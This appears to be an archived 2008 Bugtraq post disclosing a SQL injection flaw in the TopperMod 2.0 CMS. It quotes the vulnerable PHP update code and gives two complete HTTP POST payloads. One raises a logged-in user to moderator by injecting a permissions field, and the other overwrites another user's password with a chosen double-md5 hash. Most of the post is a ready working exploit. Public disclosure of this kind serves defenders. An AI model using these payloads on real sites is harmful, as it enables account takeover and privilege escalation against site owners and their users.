Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

TopperMod 2.0 Remote SQL Injection Vulnerability

from [r57blg] Network Security [Permanent Link]
Subject: TopperMod 2.0 Remote SQL Injection Vulnerability
Date: 27 Mar 2008 14:35:26 -0000 
# Author:       __GiReX__
# mySite:       www.r57shell.in

# CMS:          TopperMod v2.0
# Site:         www.wikipediatr.com

# Bug:          SQL Injection

# Type:         1 - Priviledge Escalation (from user to mod)
                2 - Remote user password change

# File:         /account/index.php
# Var :         $localita

# Need:         magic_quotes_gpc = Off
                You must be logged in


# Vuln Code: /account/index.php:        

        case "edituser_save":
        ...


        $localita=$_POST['localita']; 
        ...

        if ($localita!="") { 
                if (eregi("^[a-zA-Z0-9]",$localita)) {
                        
$localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);
                }
        }

# And if our $_POST['localita'] does not begin with a char or a number?
# Input not sanizated
        
        ...
        $res=dbquery("UPDATE ".PREFISSO."_utenti SET  email='$email', 
localita='$localita', sito='$sito', 
                     tema='$tema_user', time_zone='$time_zone'  $pass  
                     WHERE user_id='$user_id' "); 

# Vulnerable query :D

        

# PoC 1:

        POST  /[PATH]/mod.php?mod=account HTTP/1.1
        Host: [TARGET]
        ...headers...

        email=someone@somewhere.dot&localita=@', 
permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]

# PoC 2:

        POST  /[PATH]/mod.php?mod=account HTTP/1.1
        Host: [TARGET]
        ...headers...

        email=someone@somewhere.dot&localita=@', 
password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]



# Note: [PASSWORD] must be the md5 of the md5 of the wanted password, you must 
forget in the content the end quote
# We can also try to get admin hash trought sql subqueries but the password is 
crypted into md5 2 times
# and Admins don't use cookies in this CMS...
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • TopperMod 2.0 Remote SQL Injection Vulnerability, r57blg <=
Previous by Date:  [ MDVSA-2008:078 ] - Updated openssh packages fix X connection hijacking, security
Next by Date:  [securityreason] *BSD libc (strfmon) Multiple vulnerabilities, cxib
Previous by Thread:  [ MDVSA-2008:078 ] - Updated openssh packages fix X connection hijacking, security
Next by Thread:  [securityreason] *BSD libc (strfmon) Multiple vulnerabilities, cxib
Indexes:  [Date] [Thread] [Top] [All Lists]